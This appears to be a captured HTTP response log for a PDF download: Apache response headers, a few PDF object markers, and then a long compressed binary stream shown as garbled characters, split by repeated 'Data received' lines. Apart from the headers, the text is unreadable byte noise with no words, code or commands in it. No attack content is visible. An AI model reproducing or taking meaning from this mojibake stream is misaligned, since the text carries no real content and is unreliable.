Data received HTTP/1.1 200 OK Date: Wed, 31 Jul 2024 00:44:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 30 Jul 2024 11:43:56 GMT ETag: "8dc7a-61e757e2423f3" Accept-Ranges: bytes Content-Length: 580730 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf %PDF-1.7 4 0 obj (Identity) endobj 5 0 obj (Adobe) endobj 8 0 obj << /Filter /FlateDecode /Length 207375 /Length1 587304 /Type /Stream >> stream xœì½|Åù7>³{½w]‘tw:Ý©œ¤S/–,Õ«eY–-ٖ-YŅ3–.clc@ôÐbBM$1I¶±(¡$BˆÁ)ô#B±¥÷™Û´$ïÿÿ{??üÜóÙ™gwŸgæ™gf÷Î#„lð!A]•­u5™oé{‘â÷›Š;TU^¹àÜ~„{ !ݚªòƊ‚àÝ}?W‰ôªšÊªê£O¿ô’ ’ý©f^sëîƒ$‰Eüc kZÛÊ?t«òþÓQħohn eßüóü(Bøm8kWÏÚîô‘4¡³þ ò¾ÓsÎ&Ïý¿ÏCè·Aþ¡þ•kw¾Î ´þb„´Á•ÝP<òÁùs¡½aed[ÿŸÞ¿íGýx)B÷ý~U_wï§Mۆ@~Žç¯‚íOcÉùî€|⪵›¶ÞóØl?B\-B«ï>«oÃÙýÎ-Ã_BrKd]O÷Ûw¶"Üòó®íÞ:a¤Aû_B{ÏÚ¾MÝ7î¾í¸Ÿ0ä÷žÝ½¶ï–Ï?^ŽðÍp½™ÖmÜ4îBûàú,¤þÀ†¾óÊB;Áéßt-›u\ùÜì•Ëõ%#‡‘ôà{;ž!ü¥º-Í_|~r—ò}E>d•ˆC4A;Cø¨ê¶/>ÿü6åû‚¤)Éq7)q¥¢mERhi@!tB¦|8/GyI_GÒýÒO9ÿ<ÚÇ!âôRŽã$<'ù Ê%ž+\¤¦VÁý~!¡× ¿… x'Çø#R¹Sd‘è&¯ÿºÓí`§#I*Q÷ËßGw£ÿb’œøïÊ;5É^úïɗ$PYÒ¨çÔcüOQ ú–øBïûwÚý ­=S¹¤Ý>­Þ®éù/•7Ý.ٍ"§ÉÛ:Ù¿ÿÕ²à¸ñ4¹OÑ6Ügn+“Áy¯>ó1ÉOP?ú‰œÊ‘ £~>zŠšQÝÛt Øiç¼ÝúmÎ)+Eg”»çëíÊÿ-EÿFâW Åg*—¯C‹e¯az\’‹º¦µûu~ùÜzägXrùeßC~Åï_R2YþUIvÎ7«7­ÎQqú9ˆ,It²LžŒüüQ”wjûSïU,ÛÏ0~]øu×uöŸ©œÿÁ49g¬#ëEû§žï´k)<³Í¾´þYÜÓÓåò^Ôr¦6Ò{¦—s÷ ï4™o"¯dóô²3žêHÍÈ+o@^ÙË__ŸÔë½}‹$=݆$ñ·¢„o#‡»U |.ªäþŠj¹QTƒC‰Ü (•{Ep#!ÁËPD²E¸7ª‚ú‚¿ÃŸ@>•ã?#i#\ÇßPšÐnr£ÿ ú5„bh&ͤ™4“þŸK°ÆJEÿ'n#Ì!@߸þZt!ÐöÓÊÃh/Ðö¯«÷MŸ‡.EÿC’äZ´œpþ}´HˆMø—D>29ÿÃz¸Vä€VŠ¸Oäë8I=Æ_€–òQ‡€WÑù¯ƒ5¼˜ †˜'ò> "^)òeÿ·®â2¡7„¸Ÿ¢9¾“öîj”}&á‡PPûҖ» õ森¥ ¸š¶á 'ã©o\ox¼ý‡ â;á~¤çý{kœ™4“þ7'ÉcßnïãL‰û˜îmð2´˜o@WL=Æ/™žιv²Œû=º‚ßL׬Ü.TfÒLšI3i&ͤ™4“fÒLšI3i&ý¯NlÉÒ·]gNÈùýée3i&ͤ™4“fÒLšI3i&ͤ™4“fÒLšI3éÿŸ„÷£™4“fÒLšI3i&ͤ™4“fÒLšI3i&ͤ™4“þG%n™Dî ˆ8Yä®ÿÊ9úQ©È› ‰¸Eä_óÛ3ã?B3i&ͤ™4“fÒLšI3i&ͤ™4“fÒLšI3i&ͤ™4“fÒLšI3i&ͤ™4“fÒÿ•4þšI3éwâEŠ¥ÿ“~Uø?¢ÿ’àG¡`) #©ð+8ZäA ȏRP:ÊD9( 9¨Õ¢&ԂZQ7ZÐf´mC·¡Ÿ¢ƒ8+.-.3.7®(®Ô£ô<•žÏfÏÏ.Ïυž‹<WøŸùB2.üÿQғQHÏ¥WÒç Ò{ÐYhÄô‘/•~žg· ýrŽ@:ÿxüÏüf‰…_÷õýÿŒÿ¿Œÿ άfÿ—®ÇsÇ{¸Çùj”÷ÞEì/šôçþ˟÷‘?„þ|!ýûãl„Nù¿·æMÁ¯C‹¿+[ G¾ÉÿŽR:ς+mã7 ²£E¨°Çãd</Ɲ8‚×áÍø|¾_†¯Â7âÃ^"ÁoH¤8ˆ3p .Ä H†?d}rêÿyNüŸ¯¹&Úú’"!»“?_àä ‘ð ãˆÿ€ÿ|~ô3ȑ‘{¡)m¢\øßMÈÂ粯¸ ¸Îé: ÿ³Û¤ 'êÐc@O¢ÿé‰ÿêÒdʉ5¿¹PÜ?3jÿµ(¼x߅›6nX?°î쵑³Ö¬^µ²¿¯wÅòeK—,îho[Ð:¿e^óܦƆúºÚšêªÊŠò9á²ÒÙ%ųŠ òóBéiÉ¢/Ám· z­Z¥TÈeR Ïa”Vå«îò º†$_mm:Éûº¡ {JAאŠª§×òt Õ<Ók†¡fÿ)5ôfx¢&6xJPIzš§Êçz¶Òçŋ[Ú_^éëð EÜ$`I@Èh!ãõB O•}U¥gwyª†ªÏY5XÕU ò†Õª _EŸ*= «ÔՀ†’}Ã8¹ €K®š5Ì!…–œvˆ÷Wu÷Íki¯ªty½Bªd É*†ä‚,ÏjrÍèRÏpÚ£ƒ—Њ® ¦××Û½´}ˆï†Fƒ|ÕààECÆàPŠ¯r(eû_ìpË}Ci¾Êª¡ „5̟8’ú >ÏàÇ.Þ}zI·X"ó>F’[œPgÁµÁÂýy½äZ. £ÚÕÒNó´Â5‚¡`Ç×EŽ<ʎXÛȑ]ìÈDó.Ÿ—˜ªªKüwÎ*ûЮžô4оðÏÿà¸gˆt­èYExwß ¯²’êmAûP¸@¸[¼×ªáÌÔïXMÔÐÒ>ò Y|å´xˆ V·¶ MÄfC–Š!ÔÕ#¶ UU’ëòT vUÒ $²|-í÷£œñ7†s=®ƒ9(uë²U€QUƒí½ýCî.W/ôÏ~O»Ë;îõuøÚû:ˆ•|†¡”7àt^áŒB+¸·Sj³ÊäÎå~…§sñÄZP੆_y 0€
Data received ´þ¢–"ÑVme©‚­ˆe‹ – G®˜kM3ÇX²úo\R•Ÿ åóêf÷_Ò}òU…š,qÔ Nß´¬2±½í䥬DòǹókSʚ2uF§1ÉŸè¦6ö 6¶&Ã+ô†½?ÛZ$—ÇV¤•oX%•«uZ$öÃж W„>°pn¸ƒôw lÛô0—„úz€ õs‘ûlð7Wõ ×Óxt ÷Ü>µô¬:gtYMYJs —Y.æRŠSŠó3Þö¶Ö惕×5¥BH;µ”‰q>Û dä Ô.á$/sF#Ëjô)_Ò[3ގ€ü:r‚û"â„@xz/(£ëƒ3ížü¦ŸÜp‘É1†Ùè°Üâu¹|vllï)öOMÚóßÂþ¸Mnr$Ø V•N?ö^§Q9Éb——k•øïcÚSû@a[èßé'^Ã稴Jž—«•XZ?0æ7Zi¿>"]‡vÒ÷Š¡-«›yÒ1j šÉŸ…Õ9³sšáo‹%°˜8Sۖ²ùÍó¹ÌÞp/7¿w~ïòEoÕï¨]NF®rCSŽ=ª›] ^Er8½©"ª¨àÐ!²§v aáG_ʁ•­á Xà5 ýÁ©ŸïžÏ¡^C/tAþŽEoEà „Sh#pŽÙöhΒNNVFқÑœJXËCÏȞÞ?ˆ˜0+gµŠ6%ë&۔n 7yÓçÅoÜw¸›%cÉîÖÖóæß$ó¢ÑðfAuLb¬U!UÈx¹.6)ÛUӎߢ7I”ZùGzyJry†#>S)åL­¿pÂy0G?uZ€ÎÓl ò‡\•Áòuó32^жLntš=cñë—+UJ©ÎnŠOÐjÕrÃÆøsO"¬'äõ%‹ \±ÙÕ©…-Ù:“cjסS„eêd]§PFVö]0ß$]‹°²Hˆ—ÜeÅXí*"QRy{¢ˆ<G-"qQ šŠÈ‚PˆÎÔ!q‚‰tHŒœBâåTa•Ù[­.JrIt©äKËöz¹$uM‚!‘‘°c7íÝ A(¤b í¤å¡ˆ½^GÚŠÉ’ŸSöï¦F=0Ò'>B°l“Ük!ïáÕì_ÒsÙ¢äìW/oÞ–[Üv‡Ç¤¼³â¼Ê²ö‡5wáïìpu’CAm(¶4-lÚ3¼bӃ{kª*8µ\K^#ÐÊOVµ.*Y±#\¹»o¶)µ" ´Û ÚÝÑhå¢wí¦†òËò×åófyƒÊCÞ¥2{ÓÈSê4¢Ý4¢ö4!.…Hã³Ã•Á;‚yEí0yE-W"H1òjÓÀTBôíõ¦=¹Kr•„{T‚Ÿ—`‰$6ôj Þþn—n@Çé”ïÆ6‰Ëm!&]¿£Ù¯i@D"Iáõ«p‚$íÉÈ9‚Œ@èÕH ^g7‚t§çu±Êw#±4Þ&"í:'ž}é‚|R¾` 9¿?Éqr$¾z %Ü[ÒÀbçÀwå/\^w׆Y%ëoëYs]Wúü¶-³—–&p—ämغ0Ãê´Êu“֬רvséöÑí›î¿ ªrã÷ÚÍ»¯Íhì+ ³¡üsn̆%èbá¬Í@L!°t‰o.(Î%¾Úâ;®‹üLfªtüù°‰¼¥åWEókœhf­§ÑP+L€Ù$þ ÍùˆÆ9äamؘ¯ŠF ff ë SYvÙiOš¦º¨‰ÍçI¿DŸ3qû$àVäÖø—?×£{J¡VJMú§È"ØÓùÙ0=ßW»¶ÞWžHHëÍ1:©R­´ç´ÌZA=lj÷ØÃ[©»è\vÑ­^cv‰š’<*݆ºÑ>a~¨©IhM$ÈÐØÈìà^`J0¡¢œ EtqMkms´¬Úg E‹jSc5‚:@ÄûÍ9J¼rŽ°->Ž‹]¬ˆFHÛ²æh„´. E#텝ø`6qée¬‰žøLZò~©ÂÈNè7nõNKUiVw²³~öSÔoOhq,rª>kϪI+·ª@¡¤•Z•àkýP¬°‚Wç¥O,Ø¢ çtŸ®î¶Î ¦è•зÙ§$íuO–‰6É ·®E7 6ÈÉ) \>;´8>¾BMŒ±6½Ø}M5}f‡Ì“ÖUõË«“¢­5ѦÚٍéµ1:£Ý³L܀}6‡n<“˜{«ÎҚ€˜Ì#S fún۝õyü-“}»®#^F1´—ɨ,rÛDô-E¢”)s2³bJçe罹»ÿTƒ¥.Ú×é,ÌI‰ÑñXnô8É1ˆé;Îmô:¾"æ~œçáӑ;¿àK‡JW羶‰\.W)T•ð|âä_i8/ÚM†±s]wºøâžk{‰ïhm-mZDV^=×õä’a¤,ՔöÀß@pŽsoß4pmíUÑ]Õ½‹¢Ûk×4v66ÕÆ8‹ý™`š#ÎzcuMTZ#¬½„å×ä8#FÃm] }’/¸økkw]áÛ¢‘éâD~X!gÖD#paíd'¡c‘ŒDf¬‰­º¯_ˆ}MGø£—#vu]m:‰ðdM0k}ǎ¯ÂDžñšöŒºÌÒs+¡C×&夳¤dÙ ³˜€*1êø¶ã\b'cS°¹òT›åî žW)%Ž¼–‚Û-¨ úô)3j£oC W¡¹³‘ ¹Á´µxHo²æg¦µÔ6EKj<iÑ|½4¿6Ðèÿ±g QÖGŽg¿öѱãϑak©-iŠF ~~Z4¢³d”s>d?åÿ 7mÇÃJޘàïSڒâã’bTª˜¤¸ø$›ÒôV¨Y]iKKt©dLatúc«fqr§CòLl€HÄÆúJ¥ÃÿEÖWéSp©…R¥6؍žX¹BþÙe§•~$htÆé¼yé[‰¥u¦EÐ(·î>Uü¹‰«Ý±4]˜÷*fm­ÕK¥›¢=5KkÛ£uÕ鞢hEmN#SöļŽõY¦r¶~N—Ôå†} * ²z6E#DZ]{4BäUE#§Í„ÐÐùì7¶ÉW˜Gr†9ñt›I?RÆLµYŒ`3aTõucÈ͆PŠC˜*«Á¤é>0©”SiaõpUƒIßؤ_6\´§M¢g°¸à—¥Ça>]‡îì]Y*­}/ • JÏ:+$å"÷Cð·À7ÊÍÇ:–µ/(ŒöÖÔ.ˆ.«ÛXZ›Ú(KÔÄ7jêP5{¾>þM8aÁ”}|JÄÓ[€˜e ¢‘ÓÙ'%±Øpúët7Âz†ÍŽcžå[ˆÁÈ.„=ÁaO°‘]ˆûñ€F¥0 {zÙ؅̬œB®ÎÌË´}ýl›—$ζÒõ¤ôÄ gØ}Pžq›ãÛO»âL cøzô2}.q!9|åòåÅg•ù¶6´ùCd¾-Ž_ó Øx/R“Y׶ÍV µ*b^?šßX»W-¬ÛYíŽn¨9«ve´½º$T_[ޘ×è¯5N„PC»¬L £&g\0õô9—¾ò“$ŠÞàŽFˆðö•Ñ?¿6™vZMŒô²¯ØÜú·§Ó3û)Sù)M«0'8'»ƒ0ò¡;hB´;|ãùÔ=}:¥sx^’Mϳ9/ bЭ*ºâ:úÌbOОòífÔi.:Ò©sù{*íaüà3æ¡U‚Ïp»}Õ*2ÌsøÈ|`)Ê 5T›£e5>ºøqÔJÙ$01ß›ðֆê23¬vj|l±#Ô·OÕÓâé7|æïøF®';þÃpXô¶„±¹…~‡$¬
Data received lmÍ ¹ÝjAo‡»B¡’µÂfËòL¢È¸êpÉPdÍòÚ%ÑÆêL_I´º6¿qŠF'߄Zé”kgTφê~P0‘Ò¸$!rªK¢‘)’ìÓGÙ·Qø¿?®¤dƒ‡§ƒÇú0Xò”Øñ_ݧGºtUó7ÉÝ0úÐ5Bü®'KMŸÏ‡rûú4Õí9ˆxZ›A3—lÏZ—7…ksjgͲ¥Gckê‘&j«• Û{Ĉ`­²2:[‚3šØKÇÃËÎȄ„Øôh„È°i¢AŠ]4 œþ<ù ¦™ºÅâý¦ÂxÍi[*5këýÕñ9ÏËR……ìÀäxôøzyF 7Z…Ô¤+¿Ö揵ʡ’DiˆO ÙjzÃq|ƗlºPõOÝ£yQCU¢ÔÈ_÷yUlŸ7.Á SÊü çr:jÙ[0Ê®BÏþ©´Ô9—ìTNZºTёhÖÙìܶ‡ ±TíZ­þ’ÎGYÁ¤mµ‘ڍ³ú£m5skk£Õ{\º¤hV­·ÑÒx`XÞ$¬2‰Á&ÂÙ2ºÊœ²‡ú23Q”Ü֍Ù0Ñ Ò³’¢*_NN0‘7Ñ5&1æDxËÞä•|ËhöL6þv¦—½¥4¸ÁXÕ½áø¯ŠnÉÎZRe< ÊiqøÚIJåæӒþ¡”É-qÂèäõg"<š o ýÃýC&Y2Õ _=V矱³,ZÖyÑ¢N,†Bqϗ÷!ò¿8ç]Ã_Âÿ•¢¹h9¶ ÚjJ¯!»ú5 |x fÜX“S6:þ)Ù-÷ó¿q9T&oÖêM¸±Ù%Ñgò9r9Ù}6{¦†µÒsä.—<']BöYùd£µœ¢Ýc€fí©þ°¸_Ÿ)ç ë_Ñ´¾mµvòï”Ô¦zÊ_.¬_ò²§Y|¿LxS"ú"y6€CÁœgÉk ôBò(#ž ¿ ûB/A®¦þ•ˆÆjm};B„—ðïDˆøÂò—#…õž%/GàâËÿeô• Ã䂸çècw IË#[Œ°!1¹ö* O˜ò Øs&[ ,›pn`â5ŠRΜHJÒñbŽ¿Ä¬¿À›Ý¹knAË3'ÿ½Šù¹gݹ~íþio–'+”íw'æ.½ 1¥Æ FãØX_gfM(¦oIVm(¦uyË;ž»rï9 }¥.~“ϝ¸(4wkkZœÍ”ïËàTœwvGqé@[–?ܑë--Ìq8ÓfwüåMÛ¤+Þ±–®ôÖ%wô» jO.›UÆ)é)ÉÖ9q™¥ÂS è7ñO£Ùù\$ì•gÇÏ#Þét¨š<SÐ&Ç¡ù…uÙ¥óâ%¾9ä×fÓë€ö5ÚߓR³Ñ'9Ɯ:~Tð³>픖é¤é¡Hz½4+#¾F©ý½ˆT4 }š&çéé/ñåMû“÷åOw "·G²zZó- ž“ÈȦPÝêÊpw¹'¥¾¦&‰=ðI©©ªIQ˜Èƒ £ü´G>þµû»ÒÔ&«Vo°h,PÃì0;g÷5ö¥%ê›öÜ»bã{jŒþ┵Jú*rì_ÂC ²ªÝ½%¦”Š,2—ò6éz”n¦ß)ÏÅ©fñ9ƒ™=€0‹ Ìⓠ3™ocâé—Ç…¯‘ ß  ©É1ýÞx|ª°|$½>±zbóF†‘2å ¶EôKáŽtaÏW™¨NƒQÓ×lힺùÇß6m÷mG%Ír¹™×\U·ø«·^¥…ìmïÉÝT]8þ9n‘†yÑ]D[GÊ|;u>Þ&¾‹eõ$äÍœMôX6Q±¶¹õ(Y©6­b+«xÔÊÔnUÞ§r‡¡%ùëCC Ã£Añ©˜øD’þƒT:¡µ@uOÏøE3 ‰§KOՍ9­xVÐ„vø½rª 9Μ•šRDû ,Кò}üé!•xìû0⅜ùû0§zÊ¡³ò<t[ÖCw@ÍE…¹AS–S²pV؄›²FǟT•%>|Ì"/]i.<|ÌzKB H#jôË:­Ó–žŽˆ²içµ%¨¥Éu±ÕKna™}ºkÈ <UË~ƒé¾ÓVO­m«ã¯ÓÐ%.¿cr‰»÷Tíà ñ- ¥–¼¥q¶ö̋ÒÉ®{æ…$³hԊZh/ŽiŽYÃ#Q9HT•ƒXD£‚«™YÏ;(ý†ž¼VzUÒçÁÏÏÃñ‚]&ƒZü €|½9ÉN>æãê)þhÂQ‘qfǙY|õNðSññ6€ññÙô÷„_^~tApWd}dùŽö¼Ò$Qì”7ø><å ?AAIâOÁa°l¤¡>Qx'dN}iuza]z£cJo™ú»!Eâo6@d*~Ӛx=áw†]à ÄñŠ4ÔϤé"Óűî$~Oä«\á—ùF«ø^«Øá¤ÏSiVXÒ*3Š6 O³ÈšÐ–V‘Q´iÂc’/ÊØâ òÆ+ë ;*3 é- 5‰‹Î©sOúN_Ñ)¾óô’Éñ¼¥­Ùš“œU™j§ÚÈæ°z6¬®§V'âTtªeÅèÔ–vÅ« 6# ?q2å×Mð§GÄII˜eTéõ©ŽÄ:f.ÕMÌJìwD ¹†éĤŽLiC·H¿ÖÓÕÿåSӄ¢ohúš©iš2A‰]df"o­¾Z$ßGzJÐclY N6á#hq@ƒ ãT§p8^|1&^Tj¼è<ãÅ77âE¥Æ“à*>¤Â* ùe Q©…¼b!¿,a!zµ<À©È/Ñ£¦0§ƒüº¿¾Þ7Š¹ai“øÕ§NQ­ì•Vâ1ÅD¿…Eôõä QÜHDÚô¿Å¿>kãO7¬ûáÙùEïÞ¼àWéšf¥¼®²5͵k*=ø¯gß¿¯¡|ç¡ Àëï¨Û½¢(wùî¦úÝÝE¹Ëvíí»–ÿh/bÌaáÀ½yóUb_S‰}MÅü JԏJƒ¬A¢’ QIPø…‡ QLèN‰¬ªü<¯Dš9Š¥÷ê]u†æ"€¢jÊÊèbꏍЗ‹ŽÐfÒ"ÚRJšN(¨¬lbi Î0gèvt¸3½É6øÿ.§ç;˒+焧ô?‹Õe’§46µ¤¯\”|5gaØS qfåöŠÒŽ'~眇öÔr}c¥ÌkKÞa¡å¶ÔÒkãÞ{7W]Ð[b†ØrìÆÖö’Þt„sw o½Ó÷7òp@/ªT/jRÏT«u®'ª5‰?DÎ#'hÜVëz«§ÎڈD7+LËÁÉXr8(TTE&kÚEzÊ{.ò/SšŒ»‹“)Š˜¸D«#3o–ïԑêŸ3«(NëMŒÓHx̯°Å•J¥Â’ÑXprèô±º'¿2IÏ+T*¥Ž|‹´e<Ê=:©ÃӄÊšÎo¸·A:åÇE>TD¥sȋèæS~tDø±üjØMaDømâôÄ!/ ‘Qëz"üÀŠ„7š°ò@6òÊ4÷j8MÆkª÷Œóþ{ïÞÆq& oÁ¢—]ôF`  H€ØE‚ìE5J”D‘`‘À"ɲ-¹ÄŽã8Nܝ8¹ïRœKñ9²š­Äi¾(Ñ9>ùâÄ%ŗ³/ýÆqší8"ÿwf HQ²œ?÷=ÿÿ}ïîÎN{˼Svæn7Ãт!‘!kíæ_ š6!"Dö2 ˆdôDc¾òð$9寓Çr<Gkiшȏ°‘vÆü˔§Í‡ UZ‹êْ]7wnm.4+%ÈBH°nKE~S±#7Ö»yc,7¯ïº>o¼*Ï$£¡'¤”*<em
Data received úÂH*Ü–Û ².·*èêVÕµ/ûÚÏÊv§³Ýt”o»»½8²o¿&Q‰#‡kÕæî‘ÙM¢n0ü.‘ˆ#à¶ýäY“¨Ô¾¹ÃþXi²@ZÍñàê‹{Bƒ¾¸' ï{²Vwbi¶w–æf6–æ1ØRJbztè”zkävMKŽ‚ùÝÒËΟÇٍ‚¹1Üé&AöøÙð$¬·à_ð1| ÇáL¦ÒÁ8#Š„«qæ› ]aŒ€‡à ˜¯ãÑvÀ8Ês9%ݘ9šà¦dÐMß©0ÀZx>€Oà+ƙB%1‰C]¸ ×öï+< s¡6ÃNì¯Çp°T©\Nù/ƒ¦˜Ÿ:Ã-XÓö-¥i0ž‚7àø>…¯1ÎÜtåÂ.oà18Kï½a4L„Gày¨„ÓL xRç®QÐ5=ɾåc—®5ëA¼C8úÀù˜§Ÿ`%¼ ïÂGðœ€3ÌpÊÛ¿¯ Qp´Ûa0äáq:”ÂRxÖÁØá[ø‘éNyŽÃfÎ$¯‡¶pÜcq 1Á2xGÉ­°Áwðó\ð ðBM¸â ÇQûæ~<Ï‹° ÖÃ{°>‡“p–™X‡¬}lçpÚS‚úp- ……Žv%vÇað4ž_´ïÒ¥tHïÜ) úe¤wŒÂÖ¶ËÔÄRîݚAK¸zB_÷Á8OY ËáUØÛ`/†ïágæ¥}Üp´‚vp+ôƒ{ f2‹øp±UkaÏh7@{èE·àÆÃýP³à9x VÃFxöÁp α ÇFM4‚à6œM€É؇%°^ƒM°öÃøγ`vKÿæ£ú+G+ OÛ¨¡Jh†÷«Fö$Ì'\L¸ÝF·DhRyw=Â&„±„ ýûŽàî@؅°;aoÂ~„ƒ‡æöï?4Ç=Žp*á,ÂÂ%„k ·î&<LxÒF­>aa?‰YكïÔ¦Î'\L¸‚p-áÂ̈́Ûwf >TÛKXAx˜ðá ÂӄçlÔ%Bmààa}u‹0Œ0’°aÁ#ûöכÆ&¦v'Ì$B˜K8qð°Á¹zá4ÂbÂ9„%ƒG ÏÖ.EÃûê+Ùh„¶#GHe *c¬&\G¸){Øè¡ÆÂ턻÷$<Bxœð$á™ìáý³=@è"4ƒ à £6%Œ!lE˜0t@Ö`O a*aa/ÂL<ÉHÏ@Âl‘„c 'N!œN8k8 Ï<…„‹ —®$\CXFXN¸uøȬaž„» äØü!£„•„§ÏÚhrB•Ð$ %Œ Œ"l@؄°ùÈþÙ¹faálÂ2Â##±1¼‘„Mã S {fŽ…}Í;–0Ÿp2á4ÂbÂ9„ G 6л˜páJÂ5„e„å„[ wŒÚ?Ç»›ð á1ÂS6Z@¨†ŽÝ̪KXŸ°1a4a,akÂÂ4Âî„}"6·†æŽ#Ì'œL8•°˜pa)áR•„k[X›·n'ÜE¸Ÿð áQ„gl â„a0bLPacÂV„{!Ì!Ì#OX@XD8 ñº bÂR•„›w"ÆBŒ :f?utÆÆ` t„Á„á„u 돝3*¸1a4a,a<aa;Â4ŒQcF îE8„páÂ9¹“ÁK—®"\K¸p3á6„{ +#<Axz\tlLð9ÄëB$ÄØ ñú 1.$ ±eH$bbH=Ĥ†ˆmBš"&‡Ä ¶ i…˜’0.úúèÄf!©ˆÍCÒ[„ôDŒ éƒx]HblÈÄëCrãBò[†ŒGL )@L )Bl2 19¤±mÈĔ’qÑqÑ!‹›…,El²±EÈjʐuˆ×…lBŒ قx}Èvĸ]ˆ-Cö#&†DL 9‚Ø&ä8brÈIĶ!gSBa\tËèPb³P±yh0b‹ÐpĘкˆ×…ÖGŒ mŒx}h4b\h,bËÐxÄÄÐ$ĤÐvˆmBÓ“C3ۆöBL ͝:±Y¨ý[¹gr¡BFà¢7ÎÍúà|+“NêO ¤’ãï.œS ¥Œrp.;gÓ}¯‹ûUíQU¾ªìÿF¹ð_µ÷RÖúlèemœ“ÿ{[ çrœ¶Ã™]\5¤â ß>–¹ôÖ/ËË8ߔí_:ÄÅÑÂpMq ®®¥_¥²+gà±8«ŽÃyk+œoÆãZ¦5®;p¥ðÇËÿ~K$Ò|Ûçµ³q%ôû·®¹.âe¿@ϟÂ[~®t\³üõ[ Wx¿…].`M\%Á•Ïݸ¶¸Wp]6 ×Y÷âºæ>\A܏Qý®ì+O3©žþ¯ìÁp¥hcÝ_Áà?…I„m“ ÛÒøǝßMå~#lT 0Jُ¬Uiþ¨ý) úSXç˜ö›hý üÿ!/¸ =mb?åÓë/Ð\}íxºœ´Ë¡UqàǙÔÀq;üOoÕ¤-s.‰êÁB2˜÷È¡>\ù'$szÝ¥‘C¸êOH<Sáa˜Nwšþ}ÑUÎ߃öžÓàÚ³ø/Ð9,ûIHn¦ÇµGÃÜ?Q jý!ü«½`Ðù7Ñû§°?a၄w"L8„ð.Âl¡„Ã‡æŽ I8Š0—p4a᱄wŽ#¼‡p<ቄ“ó ï%, ¼°ð~ÂɄ>H8…ð!©„N#|„p:ᣄ3ªmûê&á,ÂÇ gúr³otðE–¯O?I8Ÿpa »Šwá™<‡çó鼄/çe|;¯à•„%¢D´H]D¦Èùbº(ËE™Ø.*D¥¤IqÒ@)Oš,͒I«¤ri—tX:%»ä0¹+§ÈÝåB×R×Z×V×~×1×YÅP"•&J¼’ªôV²•ñêHµ@áÎtsOqŸÓL­®ÖTk­¥i}´aÚ ­LÛ«Õ%=T¯¯ÇèÉz†ž¥çê…ú|}™¾Nß­ÑOªn 3v'<†'ÒëIñ ñLóÌ÷lõTšš™i.4W˜Ìýæ1¯åmçíçéå]ä]e…Y­¬ k˜µÍ:`JÊÊ Ê * *Z´.h[pDpzp~ðêàÍÁ»ƒŸQCÂC–„¬ M íš:9´²†V#¢Fã­jŒ¬±¤Æ¦;kªq2L «––––VVV¶2lSØΰCa'kJ5CkÖ¯S3¹fFͬš¹5 k×,­¹²æ¦š;kªy2\  ¯žžžž^^^¾2|SøÎðCá'kIµBkÕ¯S+¹VF­¬Z¹µ k×*­µ²Ö¦Z;kªu2BŠ¨‘‘‘‘QQQ±2bSÄΈC'kKµCkׯS;¹vFí¬Ú¹µ k×.­½²ö¦Ú;kª}2RŠ ¬™™™™YYY¹2rSäÎÈC‘'ëHuBëÔ¯S'¹NF¬:¹u ë×)­³²Î¦:;ëªs²®T7´n}\;Øq¥ÍÌjïÐè§ôSÕt õÕt@<>«¦_Qî¯×Ÿç¿ÿ•ÙþÇo¼Ý_¿z˜ÿñ¡ç”_ø?è;üõ& ô¼? £ýÍçûÞb–¿~ƒ [Õtœ¯Üðy*ég³Á>ã7ûä=é‰îçÔŌKlk§nJ÷Ʉy>™
Data received xüR¥Û4wä GÎwd@$û{™œë¯·‹ÐGúïß®Ä_ï0Ý_ï8.@ Ð+ôúI=Õ¶Ÿ]´/5)@ï@z@í¤¦9rº#79ò •®ƒkõv¸žì‰³áA˜·Æbn)Âñ6Îì{U«¡ 6ÃvØ p„îùS™ÅÂY”sœ2Ÿì”í“iŽÜ‹|²‹æȵ>y‹£ßÒˑN¹[ûdºéȁŽ<â“]c™åÈ>™‘ìÈbGžðÉn]¹Ó'»g:ò˜Oö(ñɞÝ}òV'Bouìï5Õ¿n ¨õÛZèôaúìj:ÿöhÿÏo çùëÙçÏ>ä¯ë VÓÑþaSI‡Xh )¸ò³¿s1g/y8،³€Y˜©í;©«`”Ã6Øà0÷Y;Ìi­a|rx¾OæÔwäŸÁÙӑË}r¤Óê#;Òé³#;ò¨OŽrZaT+G:çUNtä:­–ë´b®³ÿhç<£{Gó¯õÑükité¡Ðôw֋ï(Ž·y¹Ð'ÇÔsä8GžñɱÎx6v‡OÞíÔÂÝK|rœSkã ¹×'ïq¼¸g…OŽwF¼ñS|r‚ãí„~ŽôõíjãíÄhGÎó÷{â ÒuˆÄ5TˆxH†TÈÀ5r8=z¢Ó“&íöÉüu>yožO4u¤ÓsïsÆßB§mîwÚê~§Ö&OÄsº/FäMô˜=6@ïéŽÙ§(Ç¿|‘ï|‚ž1ˆôÙPäÄSÑ2Gž 2cçƒNû<èÔÿƒNû>x,°~§8u0¥·œM™CÇ­^ò O>dù+Åèµôк}“¿>- –9 ¨¦c­=:îçãÛ|rF¯j%m}H€>9pÏN½<çŽÇ6ûïY çû×Vñ:²ê´ÁžèûÔsŠOùäL'®f¹|òqpd¸#˜Ÿ½‹Î¢AԃÆÐZAt€tèN™ã䒹Žsù伟|r¤OÎwF«ùNOXàôϧ\IQ`k—8ãRÉÉÀOžrbì©ÿ:Y8+°v:~—Ž÷/¹(ô—q½h—O>[蓋ãYf±ÓOŸsêï¹tÆ Ç}nÈ¥úÂsN¾\rÚ'ŸwÆ´\¿<à g}rYª#Q/ËV:òÄoµø‹N ¾èäøåN=¿äÌV8½n…3¾ìäúW P„½\­Íé“U«éôÂWúUǛÕ'}rM”]¯é gz´Æ™×¼ží_òõ3¿¬ŸµNë¼!9r%E¨LO Ù?háø½ÎɞëÿÞtæBo:s¥7ŽCo:þ½yÚ¿÷—ùf~V”9£[™3Ž—mõW×Çú÷æõ‹©­ÜlŒ»0w¤ý×Wøä'—o듛âéÔí[ÎL®|©O¾ã“›qÕ"ظÙY'¼“ë“[¢ë}ËGž üä]§W¿»”>ùU»ßÝï“[qc«c÷Ö5Žtƛ÷œ¬ûÞdG:g~ok §Q½þJŒoËp¤Ó¿ÞwÆÒíNÄn¯ôÉMõÉI>ùÁXÿ³ì\ ò×?äú@ÿÖýpYàmw©OîÁñ@®6>ì ÷µ÷¦P\(Ôjg¾Ïœ™Ñ^'÷ïs"¿óù~'ö>vÎy Šzî/zÂ'ÎjãgÄ®0éŒÔŸž»Ô˜õ™#?wZö §åŽd‘Å¿8Ë'~éäû£Nf9êÌh¾jP­Îp¦ñÕý»Æþúɠж£Ÿ­¾Åãý<ο—ž«G5k^"O ‘0 À 